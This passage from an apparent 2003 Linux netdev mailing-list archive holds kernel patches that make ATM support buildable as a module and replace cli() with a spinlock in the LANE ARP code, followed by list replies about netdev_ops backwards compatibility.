= "y" ]; then - tristate 'ATM over TCP' CONFIG_ATM_TCP + dep_tristate 'ATM over TCP' CONFIG_ATM_TCP $CONFIG_ATM fi if [ "$CONFIG_PCI" = "y" ]; then - tristate 'Efficient Networks Speedstream 3010' CONFIG_ATM_LANAI - tristate 'Efficient Networks ENI155P' CONFIG_ATM_ENI + dep_tristate 'Efficient Networks Speedstream 3010' CONFIG_ATM_LANAI $CONFIG_ATM + dep_tristate 'Efficient Networks ENI155P' CONFIG_ATM_ENI $CONFIG_ATM if [ "$CONFIG_ATM_ENI" != "n" ]; then bool ' Enable extended debugging' CONFIG_ATM_ENI_DEBUG bool ' Fine-tune burst settings' CONFIG_ATM_ENI_TUNE_BURST @@ -23,8 +23,8 @@ bool ' Enable 2W RX bursts (optional)' CONFIG_ATM_ENI_BURST_RX_2W fi fi - tristate 'Fujitsu FireStream (FS50/FS155) ' CONFIG_ATM_FIRESTREAM - tristate 'ZeitNet ZN1221/ZN1225' CONFIG_ATM_ZATM + dep_tristate 'Fujitsu FireStream (FS50/FS155) ' CONFIG_ATM_FIRESTREAM $CONFIG_ATM + dep_tristate 'ZeitNet ZN1221/ZN1225' CONFIG_ATM_ZATM $CONFIG_ATM if [ "$CONFIG_ATM_ZATM" != "n" ]; then bool ' Enable extended debugging' CONFIG_ATM_ZATM_DEBUG if [ "$CONFIG_X86" = "y" ]; then @@ -35,32 +35,32 @@ # if [ "$CONFIG_ATM_TNETA1570" = "y" ]; then # bool ' Enable extended debugging' CONFIG_ATM_TNETA1570_DEBUG n # fi - tristate 'IDT 77201 (NICStAR) (ForeRunnerLE)' CONFIG_ATM_NICSTAR + dep_tristate 'IDT 77201 (NICStAR) (ForeRunnerLE)' CONFIG_ATM_NICSTAR $CONFIG_ATM if [ "$CONFIG_ATM_NICSTAR" != "n" ]; then bool ' Use suni PHY driver (155Mbps)' CONFIG_ATM_NICSTAR_USE_SUNI bool ' Use IDT77015 PHY driver (25Mbps)' CONFIG_ATM_NICSTAR_USE_IDT77105 fi - tristate 'IDT 77252 (NICStAR II)' CONFIG_ATM_IDT77252 + dep_tristate 'IDT 77252 (NICStAR II)' CONFIG_ATM_IDT77252 $CONFIG_ATM if [ "$CONFIG_ATM_IDT77252" != "n" ]; then bool ' Enable debugging messages' CONFIG_ATM_IDT77252_DEBUG bool ' Receive ALL cells in raw queue' CONFIG_ATM_IDT77252_RCV_ALL define_bool CONFIG_ATM_IDT77252_USE_SUNI y fi - tristate 'Madge Ambassador (Collage PCI 155 Server)' CONFIG_ATM_AMBASSADOR + dep_tristate 'Madge Ambassador (Collage PCI 
155 Server)' CONFIG_ATM_AMBASSADOR $CONFIG_ATM if [ "$CONFIG_ATM_AMBASSADOR" != "n" ]; then bool ' Enable debugging messages' CONFIG_ATM_AMBASSADOR_DEBUG fi - tristate 'Madge Horizon [Ultra] (Collage PCI 25 and Collage PCI 155 Client)' CONFIG_ATM_HORIZON + dep_tristate 'Madge Horizon [Ultra] (Collage PCI 25 and Collage PCI 155 Client)' CONFIG_ATM_HORIZON $CONFIG_ATM if [ "$CONFIG_ATM_HORIZON" != "n" ]; then bool ' Enable debugging messages' CONFIG_ATM_HORIZON_DEBUG fi - tristate 'Interphase ATM PCI x575/x525/x531' CONFIG_ATM_IA - if [ "$CONFIG_ATM_IA" != "n" ]; then - bool ' Enable debugging messages' CONFIG_ATM_IA_DEBUG - fi + dep_tristate 'Interphase ATM PCI x575/x525/x531' CONFIG_ATM_IA $CONFIG_ATM + if [ "$CONFIG_ATM_IA" != "n" ]; then + bool ' Enable debugging messages' CONFIG_ATM_IA_DEBUG + fi fi if [ "$CONFIG_PCI" = "y" -o "$CONFIG_SBUS" = "y" ]; then - tristate 'FORE Systems 200E-series' CONFIG_ATM_FORE200E_MAYBE + dep_tristate 'FORE Systems 200E-series' CONFIG_ATM_FORE200E_MAYBE $CONFIG_ATM if [ "$CONFIG_ATM_FORE200E_MAYBE" != "n" ]; then if [ "$CONFIG_PCI" = "y" ]; then bool ' PCA-200E support' CONFIG_ATM_FORE200E_PCA @@ -93,7 +93,7 @@ fi fi if [ "$CONFIG_PCI" = "y" ]; then - tristate 'ForeRunner HE Series' CONFIG_ATM_HE + dep_tristate 'ForeRunner HE Series' CONFIG_ATM_HE $CONFIG_ATM if [ "$CONFIG_ATM_HE" != "n" ]; then bool 'Use S/UNI PHY driver' CONFIG_ATM_HE_USE_SUNI fi diff -Nru a/drivers/net/Config.in b/drivers/net/Config.in --- a/drivers/net/Config.in Mon Jun 30 13:22:50 2003 +++ b/drivers/net/Config.in Mon Jun 30 13:22:50 2003 @@ -308,7 +308,7 @@ dep_tristate ' PPP over Ethernet (EXPERIMENTAL)' CONFIG_PPPOE $CONFIG_PPP fi if [ ! 
"$CONFIG_ATM" = "n" ]; then - dep_tristate ' PPP over ATM (EXPERIMENTAL)' CONFIG_PPPOATM $CONFIG_PPP $CONFIG_EXPERIMENTAL + dep_tristate ' PPP over ATM (EXPERIMENTAL)' CONFIG_PPPOATM $CONFIG_PPP $CONFIG_EXPERIMENTAL $CONFIG_ATM fi fi diff -Nru a/include/linux/net.h b/include/linux/net.h --- a/include/linux/net.h Mon Jun 30 13:22:50 2003 +++ b/include/linux/net.h Mon Jun 30 13:22:50 2003 @@ -139,6 +139,7 @@ extern int sock_recvmsg(struct socket *, struct msghdr *m, int len, int flags); extern int sock_readv_writev(int type, struct inode * inode, struct file * file, const struct iovec * iov, long count, long size); +extern struct socket *sockfd_lookup(int fd, int *err); extern int net_ratelimit(void); extern unsigned long net_random(void); diff -Nru a/net/Config.in b/net/Config.in --- a/net/Config.in Mon Jun 30 13:22:50 2003 +++ b/net/Config.in Mon Jun 30 13:22:50 2003 @@ -31,19 +31,19 @@ fi fi if [ "$CONFIG_EXPERIMENTAL" = "y" ]; then - bool 'Asynchronous Transfer Mode (ATM) (EXPERIMENTAL)' CONFIG_ATM - if [ "$CONFIG_ATM" = "y" ]; then + tristate 'Asynchronous Transfer Mode (ATM) (EXPERIMENTAL)' CONFIG_ATM + if [ "$CONFIG_ATM" != "n" ]; then if [ "$CONFIG_INET" = "y" ]; then - tristate ' Classical IP over ATM' CONFIG_ATM_CLIP + dep_tristate ' Classical IP over ATM' CONFIG_ATM_CLIP $CONFIG_ATM if [ "$CONFIG_ATM_CLIP" != "n" ]; then bool ' Do NOT send ICMP if no neighbour' CONFIG_ATM_CLIP_NO_ICMP fi fi - tristate ' LAN Emulation (LANE) support' CONFIG_ATM_LANE + dep_tristate ' LAN Emulation (LANE) support' CONFIG_ATM_LANE $CONFIG_ATM if [ "$CONFIG_INET" = "y" -a "$CONFIG_ATM_LANE" != "n" ]; then tristate ' Multi-Protocol Over ATM (MPOA) support' CONFIG_ATM_MPOA fi - tristate ' RFC1483/2684 Bridged protocols' CONFIG_ATM_BR2684 + dep_tristate ' RFC1483/2684 Bridged protocols' CONFIG_ATM_BR2684 $CONFIG_ATM if [ "$CONFIG_ATM_BR2684" != "n" ]; then bool ' Per-VC IP filter kludge' CONFIG_ATM_BR2684_IPFILTER fi diff -Nru a/net/atm/Makefile b/net/atm/Makefile --- 
a/net/atm/Makefile Mon Jun 30 13:22:50 2003 +++ b/net/atm/Makefile Mon Jun 30 13:22:50 2003 @@ -14,7 +14,10 @@ list-multi := mpoa.o mpoa-objs := mpc.o mpoa_caches.o mpoa_proc.o -obj-$(CONFIG_ATM) := addr.o pvc.o signaling.o svc.o common.o atm_misc.o raw.o resources.o +obj-y := addr.o pvc.o signaling.o svc.o common.o atm_misc.o raw.o resources.o +ifeq ($(CONFIG_ATM),m) + obj-m += $(O_TARGET) +endif ifneq ($(CONFIG_ATM_CLIP),n) NEED_IPCOM = ipcommon.o @@ -31,13 +34,13 @@ obj-$(CONFIG_ATM_BR2684) += br2684.o ifeq ($(CONFIG_NET_SCH_ATM),y) -NEED_IPCOM = ipcommon.o + NEED_IPCOM = ipcommon.o endif obj-y += $(NEED_IPCOM) ifeq ($(CONFIG_PROC_FS),y) -obj-y += proc.o + obj-y += proc.o endif obj-$(CONFIG_ATM_LANE) += lec.o diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 30 13:22:50 2003 +++ b/net/atm/common.c Mon Jun 30 13:22:50 2003 @@ -21,6 +21,7 @@ #include /* struct timeval */ #include #include +#include #include /* struct sock */ #include @@ -1217,3 +1218,43 @@ return; } #endif + +static int __init atm_init(void) +{ + int error; + + if ((error = atmpvc_init()) < 0) { + printk(KERN_ERR "atmpvc_init() failed with %d\n", error); + goto failure; + } + if ((error = atmsvc_init()) < 0) { + printk(KERN_ERR "atmsvc_init() failed with %d\n", error); + goto failure; + } +#ifdef CONFIG_PROC_FS + if ((error = atm_proc_init()) < 0) { + printk(KERN_ERR "atm_proc_init() failed with %d\n",error); + goto failure; + } +#endif + return 0; + +failure: + atmsvc_exit(); + atmpvc_exit(); + return error; +} + +static void __exit atm_exit(void) +{ +#ifdef CONFIG_PROC_FS + atm_proc_exit(); +#endif + atmsvc_exit(); + atmpvc_exit(); +} + +module_init(atm_init); +module_exit(atm_exit); + +MODULE_LICENSE("GPL"); diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jun 30 13:22:50 2003 +++ b/net/atm/common.h Mon Jun 30 13:22:50 2003 @@ -28,7 +28,12 @@ void atm_release_vcc_sk(struct sock *sk,int free_sk); void atm_shutdown_dev(struct atm_dev *dev); 
+int atmpvc_init(void); +void atmpvc_exit(void); +int atmsvc_init(void); +void atmsvc_exit(void); int atm_proc_init(void); +void atm_proc_exit(void); /* SVC */ diff -Nru a/net/atm/proc.c b/net/atm/proc.c --- a/net/atm/proc.c Mon Jun 30 13:22:50 2003 +++ b/net/atm/proc.c Mon Jun 30 13:22:50 2003 @@ -632,12 +632,28 @@ name->proc_fops = &proc_spec_atm_operations; \ name->owner = THIS_MODULE +static struct proc_dir_entry *devices = NULL, *pvc = NULL, + *svc = NULL, *arp = NULL, *lec = NULL, *vc = NULL; -int __init atm_proc_init(void) +static void atm_proc_cleanup(void) { - struct proc_dir_entry *devices = NULL,*pvc = NULL,*svc = NULL; - struct proc_dir_entry *arp = NULL,*lec = NULL,*vc = NULL; + if (devices) + remove_proc_entry("devices",atm_proc_root); + if (pvc) + remove_proc_entry("pvc",atm_proc_root); + if (svc) + remove_proc_entry("svc",atm_proc_root); + if (arp) + remove_proc_entry("arp",atm_proc_root); + if (lec) + remove_proc_entry("lec",atm_proc_root); + if (vc) + remove_proc_entry("vc",atm_proc_root); + remove_proc_entry("net/atm",NULL); +} +int atm_proc_init(void) +{ atm_proc_root = proc_mkdir("net/atm",NULL); if (!atm_proc_root) return -ENOMEM; @@ -654,12 +670,11 @@ return 0; cleanup: - if (devices) remove_proc_entry("devices",atm_proc_root); - if (pvc) remove_proc_entry("pvc",atm_proc_root); - if (svc) remove_proc_entry("svc",atm_proc_root); - if (arp) remove_proc_entry("arp",atm_proc_root); - if (lec) remove_proc_entry("lec",atm_proc_root); - if (vc) remove_proc_entry("vc",atm_proc_root); - remove_proc_entry("net/atm",NULL); + atm_proc_cleanup(); return -ENOMEM; +} + +void atm_proc_exit(void) +{ + atm_proc_cleanup(); } diff -Nru a/net/atm/pvc.c b/net/atm/pvc.c --- a/net/atm/pvc.c Mon Jun 30 13:22:50 2003 +++ b/net/atm/pvc.c Mon Jun 30 13:22:50 2003 @@ -120,20 +120,12 @@ */ -static int __init atmpvc_init(void) +int atmpvc_init(void) { - int error; - - error = sock_register(&pvc_family_ops); - if (error < 0) { - printk(KERN_ERR "ATMPVC: can't register 
(%d)",error); - return error; - } -#ifdef CONFIG_PROC_FS - error = atm_proc_init(); - if (error) printk("atm_proc_init fails with %d\n",error); -#endif - return 0; + return sock_register(&pvc_family_ops); } -module_init(atmpvc_init); +void atmpvc_exit(void) +{ + sock_unregister(PF_ATMPVC); +} diff -Nru a/net/atm/svc.c b/net/atm/svc.c --- a/net/atm/svc.c Mon Jun 30 13:22:50 2003 +++ b/net/atm/svc.c Mon Jun 30 13:22:50 2003 @@ -443,13 +443,12 @@ * Initialize the ATM SVC protocol family */ -static int __init atmsvc_init(void) +int atmsvc_init(void) { - if (sock_register(&svc_family_ops) < 0) { - printk(KERN_ERR "ATMSVC: can't register"); - return -1; - } - return 0; + return sock_register(&svc_family_ops); } -module_init(atmsvc_init); +void atmsvc_exit(void) +{ + sock_unregister(PF_ATMSVC); +} diff -Nru a/net/netsyms.c b/net/netsyms.c --- a/net/netsyms.c Mon Jun 30 13:22:50 2003 +++ b/net/netsyms.c Mon Jun 30 13:22:50 2003 @@ -163,6 +163,7 @@ EXPORT_SYMBOL(put_cmsg); EXPORT_SYMBOL(sock_kmalloc); EXPORT_SYMBOL(sock_kfree_s); +EXPORT_SYMBOL(sockfd_lookup); #ifdef CONFIG_FILTER EXPORT_SYMBOL(sk_run_filter); diff -Nru a/net/sched/Config.in b/net/sched/Config.in --- a/net/sched/Config.in Mon Jun 30 13:22:50 2003 +++ b/net/sched/Config.in Mon Jun 30 13:22:50 2003 @@ -6,8 +6,8 @@ tristate ' CSZ packet scheduler' CONFIG_NET_SCH_CSZ #tristate ' H-PFQ packet scheduler' CONFIG_NET_SCH_HPFQ #tristate ' H-FSC packet scheduler' CONFIG_NET_SCH_HFCS -if [ "$CONFIG_ATM" = "y" ]; then - bool ' ATM pseudo-scheduler' CONFIG_NET_SCH_ATM +if [ "$CONFIG_ATM" != "n" ]; then + dep_tristate ' ATM pseudo-scheduler' CONFIG_NET_SCH_ATM $CONFIG_ATM fi tristate ' The simplest PRIO pseudoscheduler' CONFIG_NET_SCH_PRIO tristate ' RED queue' CONFIG_NET_SCH_RED [atm]: eliminate cli, make function names sane # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1014 -> 1.1015 # net/atm/lec.c 1.15 -> 1.16 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/27 davem@nuts.ninka.net 1.1011.1.17 # Merge nuts.ninka.net:/home/davem/src/BK/network-2.4 # into nuts.ninka.net:/home/davem/src/BK/net-2.4 # -------------------------------------------- # 03/06/27 hch@lst.de 1.1011.1.18 # [CRYPTO-2.4]: Missing ULL postfixes and statics. # -------------------------------------------- # 03/06/27 chas@relax.cmf.nrl.navy.mil 1.1015 # elminate cli, make function names sane # -------------------------------------------- # diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 30 13:22:04 2003 +++ b/net/atm/lec.c Mon Jun 30 13:22:04 2003 @@ -20,6 +20,7 @@ #include #include #include +#include /* TokenRing if needed */ #ifdef CONFIG_TR @@ -55,6 +56,7 @@ unsigned char *addr); extern void (*br_fdb_put_hook)(struct net_bridge_fdb_entry *ent); +static spinlock_t lec_arp_spinlock = SPIN_LOCK_UNLOCKED; #define DUMP_PACKETS 0 /* 0 = None, * 1 = 30 first bytes @@ -1049,15 +1051,15 @@ #define HASH(ch) (ch & (LEC_ARP_TABLE_SIZE -1)) static __inline__ void -lec_arp_lock(struct lec_priv *priv) +lec_arp_get(struct lec_priv *priv) { - atomic_inc(&priv->lec_arp_lock_var); + atomic_inc(&priv->lec_arp_users); } static __inline__ void -lec_arp_unlock(struct lec_priv *priv) +lec_arp_put(struct lec_priv *priv) { - atomic_dec(&priv->lec_arp_lock_var); + atomic_dec(&priv->lec_arp_users); } /* @@ -1108,33 +1110,33 @@ * LANE2: Add to the end of the list to satisfy 8.1.13 */ static __inline__ void -lec_arp_put(struct lec_arp_table **lec_arp_tables, - struct lec_arp_table *to_put) +lec_arp_add(struct lec_arp_table **lec_arp_tables, + struct lec_arp_table *to_add) { - unsigned short place; unsigned long flags; + unsigned short place; struct lec_arp_table *tmp; - save_flags(flags); - cli(); + spin_lock_irqsave(&lec_arp_spinlock, flags); - place = 
HASH(to_put->mac_addr[ETH_ALEN-1]); + place = HASH(to_add->mac_addr[ETH_ALEN-1]); tmp = lec_arp_tables[place]; - to_put->next = NULL; + to_add->next = NULL; if (tmp == NULL) - lec_arp_tables[place] = to_put; + lec_arp_tables[place] = to_add; else { /* add to the end */ while (tmp->next) tmp = tmp->next; - tmp->next = to_put; + tmp->next = to_add; } - restore_flags(flags); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); + DPRINTK("LEC_ARP: Added entry:%2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", - 0xff&to_put->mac_addr[0], 0xff&to_put->mac_addr[1], - 0xff&to_put->mac_addr[2], 0xff&to_put->mac_addr[3], - 0xff&to_put->mac_addr[4], 0xff&to_put->mac_addr[5]); + 0xff&to_add->mac_addr[0], 0xff&to_add->mac_addr[1], + 0xff&to_add->mac_addr[2], 0xff&to_add->mac_addr[3], + 0xff&to_add->mac_addr[4], 0xff&to_add->mac_addr[5]); } /* @@ -1144,16 +1146,15 @@ lec_arp_remove(struct lec_arp_table **lec_arp_tables, struct lec_arp_table *to_remove) { + unsigned long flags; unsigned short place; struct lec_arp_table *tmp; - unsigned long flags; int remove_vcc=1; - save_flags(flags); - cli(); + spin_lock_irqsave(&lec_arp_spinlock, flags); if (!to_remove) { - restore_flags(flags); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); return -1; } place = HASH(to_remove->mac_addr[ETH_ALEN-1]); @@ -1165,7 +1166,7 @@ tmp = tmp->next; } if (!tmp) {/* Entry was not found */ - restore_flags(flags); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); return -1; } } @@ -1191,7 +1192,9 @@ lec_arp_clear_vccs(to_remove); } skb_queue_purge(&to_remove->tx_wait); /* FIXME: good place for this? 
*/ - restore_flags(flags); + + spin_unlock_irqrestore(&lec_arp_spinlock, flags); + DPRINTK("LEC_ARP: Removed entry:%2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", 0xff&to_remove->mac_addr[0], 0xff&to_remove->mac_addr[1], 0xff&to_remove->mac_addr[2], 0xff&to_remove->mac_addr[3], @@ -1376,12 +1379,8 @@ lec_arp_destroy(struct lec_priv *priv) { struct lec_arp_table *entry, *next; - unsigned long flags; int i; - save_flags(flags); - cli(); - del_timer(&priv->lec_arp_timer); /* @@ -1424,7 +1423,6 @@ priv->mcast_vcc = NULL; memset(priv->lec_arp_tables, 0, sizeof(struct lec_arp_table*)*LEC_ARP_TABLE_SIZE); - restore_flags(flags); } @@ -1441,18 +1439,18 @@ DPRINTK("LEC_ARP: lec_arp_find :%2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", mac_addr[0]&0xff, mac_addr[1]&0xff, mac_addr[2]&0xff, mac_addr[3]&0xff, mac_addr[4]&0xff, mac_addr[5]&0xff); - lec_arp_lock(priv); + lec_arp_get(priv); place = HASH(mac_addr[ETH_ALEN-1]); to_return = priv->lec_arp_tables[place]; while(to_return) { if (memcmp(mac_addr, to_return->mac_addr, ETH_ALEN) == 0) { - lec_arp_unlock(priv); + lec_arp_put(priv); return to_return; } to_return = to_return->next; } - lec_arp_unlock(priv); + lec_arp_put(priv); return NULL; } @@ -1579,11 +1577,11 @@ del_timer(&priv->lec_arp_timer); DPRINTK("lec_arp_check_expire %p,%d\n",priv, - priv->lec_arp_lock_var.counter); + atomic_read(&priv->lec_arp_users)); DPRINTK("expire: eo:%p nf:%p\n",priv->lec_arp_empty_ones, priv->lec_no_forward); - if (!priv->lec_arp_lock_var.counter) { - lec_arp_lock(priv); + if (!atomic_read(&priv->lec_arp_users)) { + lec_arp_get(priv); now = jiffies; for(i=0;ilec_arp_timer.expires = jiffies + LEC_ARP_REFRESH_INTERVAL; add_timer(&priv->lec_arp_timer); @@ -1691,7 +1689,7 @@ if (!entry) { return priv->mcast_vcc; } - lec_arp_put(priv->lec_arp_tables, entry); + lec_arp_add(priv->lec_arp_tables, entry); /* We want arp-request(s) to be sent */ entry->packets_flooded =1; entry->status = ESI_ARP_PENDING; @@ -1716,7 +1714,7 @@ struct lec_arp_table *entry, *next; int i; 
- lec_arp_lock(priv); + lec_arp_get(priv); DPRINTK("lec_addr_delete\n"); for(i=0;ilec_arp_tables[i];entry != NULL; entry=next) { @@ -1727,11 +1725,11 @@ lec_arp_remove(priv->lec_arp_tables, entry); kfree(entry); } - lec_arp_unlock(priv); + lec_arp_put(priv); return 0; } } - lec_arp_unlock(priv); + lec_arp_put(priv); return -1; } @@ -1756,7 +1754,7 @@ return; /* LANE2: ignore targetless LE_ARPs for which * we have no entry in the cache. 7.1.30 */ - lec_arp_lock(priv); + lec_arp_get(priv); if (priv->lec_arp_empty_ones) { entry = priv->lec_arp_empty_ones; if (!memcmp(entry->atm_addr, atm_addr, ATM_ESA_LEN)) { @@ -1790,13 +1788,13 @@ entry->status = ESI_FORWARD_DIRECT; memcpy(entry->mac_addr, mac_addr, ETH_ALEN); entry->last_used = jiffies; - lec_arp_put(priv->lec_arp_tables, entry); + lec_arp_add(priv->lec_arp_tables, entry); } if (remoteflag) entry->flags|=LEC_REMOTE_FLAG; else entry->flags&=~LEC_REMOTE_FLAG; - lec_arp_unlock(priv); + lec_arp_put(priv); DPRINTK("After update\n"); dump_arp_table(priv); return; @@ -1806,11 +1804,11 @@ if (!entry) { entry = make_entry(priv, mac_addr); if (!entry) { - lec_arp_unlock(priv); + lec_arp_put(priv); return; } entry->status = ESI_UNKNOWN; - lec_arp_put(priv->lec_arp_tables, entry); + lec_arp_add(priv->lec_arp_tables, entry); /* Temporary, changes before end of function */ } memcpy(entry->atm_addr, atm_addr, ATM_ESA_LEN); @@ -1845,7 +1843,7 @@ } DPRINTK("After update2\n"); dump_arp_table(priv); - lec_arp_unlock(priv); + lec_arp_put(priv); } /* @@ -1859,7 +1857,7 @@ struct lec_arp_table *entry; int i, found_entry=0; - lec_arp_lock(priv); + lec_arp_get(priv); if (ioc_data->receive == 2) { /* Vcc for Multicast Forward. 
No timer, LANEv2 7.1.20 and 2.3.5.3 */ @@ -1868,7 +1866,7 @@ entry = lec_arp_find(priv, bus_mac); if (!entry) { printk("LEC_ARP: Multicast entry not found!\n"); - lec_arp_unlock(priv); + lec_arp_put(priv); return; } memcpy(entry->atm_addr, ioc_data->atm_addr, ATM_ESA_LEN); @@ -1877,7 +1875,7 @@ #endif entry = make_entry(priv, bus_mac); if (entry == NULL) { - lec_arp_unlock(priv); + lec_arp_put(priv); return; } del_timer(&entry->timer); @@ -1886,7 +1884,7 @@ entry->old_recv_push = old_push; entry->next = priv->mcast_fwds; priv->mcast_fwds = entry; - lec_arp_unlock(priv); + lec_arp_put(priv); return; } else if (ioc_data->receive == 1) { /* Vcc which we don't want to make default vcc, attach it @@ -1904,7 +1902,7 @@ ioc_data->atm_addr[18],ioc_data->atm_addr[19]); entry = make_entry(priv, bus_mac); if (entry == NULL) { - lec_arp_unlock(priv); + lec_arp_put(priv); return; } memcpy(entry->atm_addr, ioc_data->atm_addr, ATM_ESA_LEN); @@ -1917,7 +1915,7 @@ add_timer(&entry->timer); entry->next = priv->lec_no_forward; priv->lec_no_forward = entry; - lec_arp_unlock(priv); + lec_arp_put(priv); dump_arp_table(priv); return; } @@ -1976,7 +1974,7 @@ } } if (found_entry) { - lec_arp_unlock(priv); + lec_arp_put(priv); DPRINTK("After vcc was added\n"); dump_arp_table(priv); return; @@ -1985,7 +1983,7 @@ this vcc */ entry = make_entry(priv, bus_mac); if (!entry) { - lec_arp_unlock(priv); + lec_arp_put(priv); return; } entry->vcc = vcc; @@ -1998,7 +1996,7 @@ entry->timer.expires = jiffies + priv->vcc_timeout_period; entry->timer.function = lec_arp_expire_vcc; add_timer(&entry->timer); - lec_arp_unlock(priv); + lec_arp_put(priv); DPRINTK("After vcc was added\n"); dump_arp_table(priv); } @@ -2044,10 +2042,10 @@ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; struct lec_arp_table *to_add; - lec_arp_lock(priv); + lec_arp_get(priv); to_add = make_entry(priv, mac_addr); if (!to_add) { - lec_arp_unlock(priv); + lec_arp_put(priv); return -ENOMEM; } memcpy(to_add->atm_addr, vcc->remote.sas_addr.prv, 
ATM_ESA_LEN); @@ -2057,8 +2055,8 @@ to_add->old_push = vcc->push; vcc->push = lec_push; priv->mcast_vcc = vcc; - lec_arp_put(priv->lec_arp_tables, to_add); - lec_arp_unlock(priv); + lec_arp_add(priv->lec_arp_tables, to_add); + lec_arp_put(priv); return 0; } @@ -2070,7 +2068,7 @@ DPRINTK("LEC_ARP: lec_vcc_close vpi:%d vci:%d\n",vcc->vpi,vcc->vci); dump_arp_table(priv); - lec_arp_lock(priv); + lec_arp_get(priv); for(i=0;ilec_arp_tables[i];entry; entry=next) { next = entry->next; @@ -2132,7 +2130,7 @@ entry = next; } - lec_arp_unlock(priv); + lec_arp_put(priv); dump_arp_table(priv); } @@ -2140,9 +2138,9 @@ lec_arp_check_empties(struct lec_priv *priv, struct atm_vcc *vcc, struct sk_buff *skb) { + unsigned long flags; struct lec_arp_table *entry, *prev; struct lecdatahdr_8023 *hdr = (struct lecdatahdr_8023 *)skb->data; - unsigned long flags; unsigned char *src; #ifdef CONFIG_TR struct lecdatahdr_8025 *tr_hdr = (struct lecdatahdr_8025 *)skb->data; @@ -2152,26 +2150,26 @@ #endif src = hdr->h_source; - lec_arp_lock(priv); + lec_arp_get(priv); entry = priv->lec_arp_empty_ones; if (vcc == entry->vcc) { - save_flags(flags); - cli(); + spin_lock_irqsave(&lec_arp_spinlock, flags); del_timer(&entry->timer); memcpy(entry->mac_addr, src, ETH_ALEN); entry->status = ESI_FORWARD_DIRECT; entry->last_used = jiffies; priv->lec_arp_empty_ones = entry->next; - restore_flags(flags); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); /* We might have got an entry */ if ((prev=lec_arp_find(priv,src))) { lec_arp_remove(priv->lec_arp_tables, prev); kfree(prev); } - lec_arp_put(priv->lec_arp_tables, entry); - lec_arp_unlock(priv); + lec_arp_add(priv->lec_arp_tables, entry); + lec_arp_put(priv); return; } + spin_lock_irqsave(&lec_arp_spinlock, flags); prev = entry; entry = entry->next; while (entry && entry->vcc != vcc) { @@ -2180,22 +2178,21 @@ } if (!entry) { DPRINTK("LEC_ARP: Arp_check_empties: entry not found!\n"); - lec_arp_unlock(priv); + lec_arp_put(priv); + 
spin_unlock_irqrestore(&lec_arp_spinlock, flags); return; } - save_flags(flags); - cli(); del_timer(&entry->timer); memcpy(entry->mac_addr, src, ETH_ALEN); entry->status = ESI_FORWARD_DIRECT; entry->last_used = jiffies; prev->next = entry->next; - restore_flags(flags); + spin_unlock_irqrestore(&lec_arp_spinlock, flags); if ((prev = lec_arp_find(priv, src))) { lec_arp_remove(priv->lec_arp_tables,prev); kfree(prev); } - lec_arp_put(priv->lec_arp_tables,entry); - lec_arp_unlock(priv); + lec_arp_add(priv->lec_arp_tables,entry); + lec_arp_put(priv); } MODULE_LICENSE("GPL"); From davem@redhat.com Thu Jul 10 13:46:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 13:47:21 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AKk62x022106 for ; Thu, 10 Jul 2003 13:46:47 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id NAA27192; Thu, 10 Jul 2003 13:37:37 -0700 Date: Thu, 10 Jul 2003 13:37:37 -0700 (PDT) Message-Id: <20030710.133737.41660806.davem@redhat.com> To: scott.feldman@intel.com Cc: willy@debian.org, netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops From: "David S. Miller" In-Reply-To: References: X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3911 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: "Feldman, Scott" Date: Thu, 10 Jul 2003 01:18:50 -0700 With HAVE_NETDEV_OPS, you're right, we're maintaining the wrapper code outside the kernel. But, it does leave the possibility of having a shared backwards compatibility code for multiple (all?) 
drivers for those stuck with supporting kernels without netdev_ops. And precisely I am showing you how all this backwards compat stuff is going to hurt you. You can never truly take advantage of things that eliminate duplicated code in all the drivers, and this netdev_ops case is a great example. From krkumar@us.ibm.com Thu Jul 10 15:17:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 15:17:58 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AMGr2x023078 for ; Thu, 10 Jul 2003 15:17:23 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6AMFoXq203788; Thu, 10 Jul 2003 18:15:50 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6AMFlDQ083410; Thu, 10 Jul 2003 18:15:48 -0400 Message-ID: <3F0DE5B9.20702@us.ibm.com> Date: Thu, 10 Jul 2003 15:16:25 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: yoshfuji@linux-ipv6.org CC: davem@redhat.com, netdev@oss.sgi.com, 